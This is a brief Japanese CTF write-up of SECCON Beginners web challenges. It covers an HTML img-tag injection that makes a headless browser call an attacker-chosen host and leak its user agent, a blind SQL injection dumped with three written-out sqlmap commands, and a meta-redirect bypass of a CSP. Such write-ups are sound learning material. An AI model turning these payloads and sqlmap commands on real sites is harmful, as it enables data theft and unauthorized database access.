Web
[Warmup] Greeting
説明
ユーザー名を入れるフォームと php のコードが書いてある
Gimme your comment
説明
件名と本文を登録すると 次の瞬間に ヘッドレスブラウザが動いて 定型文を post するシステム
解法
このヘッドレスブラウザ の UA が flag
- なので ヘッドレスブラウザ から 適当な ホストへ リクエストが飛べばいい
- EC2か何かのURLを <img src=http://hogehoge> とかして 本文に書き込めばOK
SECCON Goods
説明
在庫一覧が表示されるページ
解法
- どうやら http://goods.chall.beginners.seccon.jp/items.php?minstock=0 の json が表示されている
- この minstock は 単純な数字のほか 2+3 とか簡単な計算式でも OK
- この minstock に select count(*) from items と入れると minstock=8 と同じ挙動
- なので ブラインドSQLインジェクションができそう
- あとは sqlmap すればいいだけ
sqlmap.py -u http://goods.chall.beginners.seccon.jp/items.php\?minstock\=5 --dbs
sqlmap.py -u http://goods.chall.beginners.seccon.jp/items.php\?minstock\=5 --tables
sqlmap.py -u http://goods.chall.beginners.seccon.jp/items.php\?minstock\=5 -T flag --dump
Gimme your comment REVENGE
説明
Gimme your comment と大体同じだけど今度は
CSP https://developer.mozilla.org/ja/docs/Web/HTTP/CSP で対策されている
- Content-Security-Policy: default-src 'self'
解法
- headless ブラウザで適当なところにアクセスさせたいだけなので
- meta タグで redirect すれば OK